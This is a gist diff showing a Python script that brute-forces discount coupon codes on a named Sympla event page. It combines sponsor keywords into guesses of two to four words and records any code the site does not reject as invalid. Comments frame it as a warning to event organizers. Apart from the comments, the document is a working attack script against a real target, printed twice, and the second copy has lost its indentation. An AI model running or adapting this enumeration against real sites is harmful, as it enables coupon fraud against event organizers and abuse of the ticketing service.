endersonmenezes · August 23, 2019 21:53
diff --git a/bruteforce.py b/bruteforce.py
 #  Copyright (c) 2018. Enderson Menezes Cândido [www.endersonmenezes.com.br]
 #  Your console will display a list of available discount coupons.
 #  Do not use this code to gain advantage or illegally enter the event.
 #  Code just to demonstrate that creating discount coupons in sympla using simple word combinations can be hacked.
 #  This gist serves to show how social engineering be taken care of by event organizations.
 #  To event organizers please create discount coupon processes and tracking processes.
 #  Working Since 2018

 import requests
 import itertools

 # Enter EVENT link with ?d=
 url = 'https://www.sympla.com.br/ticnova-2019__594324?d='

 # Search for the current sponsors of the year, and enter the words here.
 tentativasarray = ['TICNOVA', '2019', 'UNICESUMAR', 'SBM', 'CESUMAR', 'SOFTWAREBY', 'SOFTWAREBYMARINGA', 'ACCION',
                   'BUYSOFT', 'GETCARD', 'TECNOSPEED', 'ALUNO', 'BYTEABYTE', 'ACIM', 'SEBRAE']

 tentativas_comb = itertools.product(tentativasarray, repeat=2)
 tentativas_comb_3 = itertools.product(tentativasarray, repeat=3)
 tentativas_comb_4 = itertools.product(tentativasarray, repeat=4)

 pagina = requests.get(str(url) + 'TICNOVA2019SBM')
 descontoinvalido = pagina.text.find('Codigo inválido')
 cupons_funcionando = list()
 tentativas_realizadas = 0
 for tentativas in tentativas_comb:
    pagina = requests.get(str(url) + tentativas[0] + tentativas[1])
    descontoinvalido = pagina.text.find('Código inválido')
    if descontoinvalido == -1:
        cupons_funcionando.append(str(tentativas))
    tentativas_realizadas += 1
    print(tentativas_realizadas)
    print(cupons_funcionando)


 for tentativas in tentativas_comb_3:
    pagina = requests.get(str(url) + tentativas[0] + tentativas[1] + tentativas[2])
    descontoinvalido = pagina.text.find('Código inválido')
    if descontoinvalido == -1:
        cupons_funcionando.append(str(tentativas))
    tentativas_realizadas += 1
    print(tentativas_realizadas)
    print(cupons_funcionando)


 for tentativas in tentativas_comb_4:
    pagina = requests.get(str(url) + tentativas[0] + tentativas[1] + tentativas[2] + tentativas[3])
    descontoinvalido = pagina.text.find('Código inválido')
    if descontoinvalido == -1:
        cupons_funcionando.append(str(tentativas))
    tentativas_realizadas += 1
    print(tentativas_realizadas)
    print(cupons_funcionando)
	# Copyright (c) 2018. Enderson Menezes Cândido [www.endersonmenezes.com.br]
	# Your console will display a list of available discount coupons.
	# Do not use this code to gain advantage or illegally enter the event.
	# Code just to demonstrate that creating discount coupons in sympla using simple word combinations can be hacked.
	# This gist serves to show how social engineering be taken care of by event organizations.
	# To event organizers please create discount coupon processes and tracking processes.
	# Working Since 2018

	import requests
	import itertools

	# Enter EVENT link with ?d=
	url = 'https://www.sympla.com.br/ticnova-2019__594324?d='

	# Search for the current sponsors of the year, and enter the words here.
	tentativasarray = ['TICNOVA', '2019', 'UNICESUMAR', 'SBM', 'CESUMAR', 'SOFTWAREBY', 'SOFTWAREBYMARINGA', 'ACCION',
	'BUYSOFT', 'GETCARD', 'TECNOSPEED', 'ALUNO', 'BYTEABYTE', 'ACIM', 'SEBRAE']

	tentativas_comb = itertools.product(tentativasarray, repeat=2)
	tentativas_comb_3 = itertools.product(tentativasarray, repeat=3)
	tentativas_comb_4 = itertools.product(tentativasarray, repeat=4)

	pagina = requests.get(str(url) + 'TICNOVA2019SBM')
	descontoinvalido = pagina.text.find('Codigo inválido')
	cupons_funcionando = list()
	tentativas_realizadas = 0
	for tentativas in tentativas_comb:
	pagina = requests.get(str(url) + tentativas[0] + tentativas[1])
	descontoinvalido = pagina.text.find('Código inválido')
	if descontoinvalido == -1:
	cupons_funcionando.append(str(tentativas))
	tentativas_realizadas += 1
	print(tentativas_realizadas)
	print(cupons_funcionando)


	for tentativas in tentativas_comb_3:
	pagina = requests.get(str(url) + tentativas[0] + tentativas[1] + tentativas[2])
	descontoinvalido = pagina.text.find('Código inválido')
	if descontoinvalido == -1:
	cupons_funcionando.append(str(tentativas))
	tentativas_realizadas += 1
	print(tentativas_realizadas)
	print(cupons_funcionando)


	for tentativas in tentativas_comb_4:
	pagina = requests.get(str(url) + tentativas[0] + tentativas[1] + tentativas[2] + tentativas[3])
	descontoinvalido = pagina.text.find('Código inválido')
	if descontoinvalido == -1:
	cupons_funcionando.append(str(tentativas))
	tentativas_realizadas += 1
	print(tentativas_realizadas)
	print(cupons_funcionando)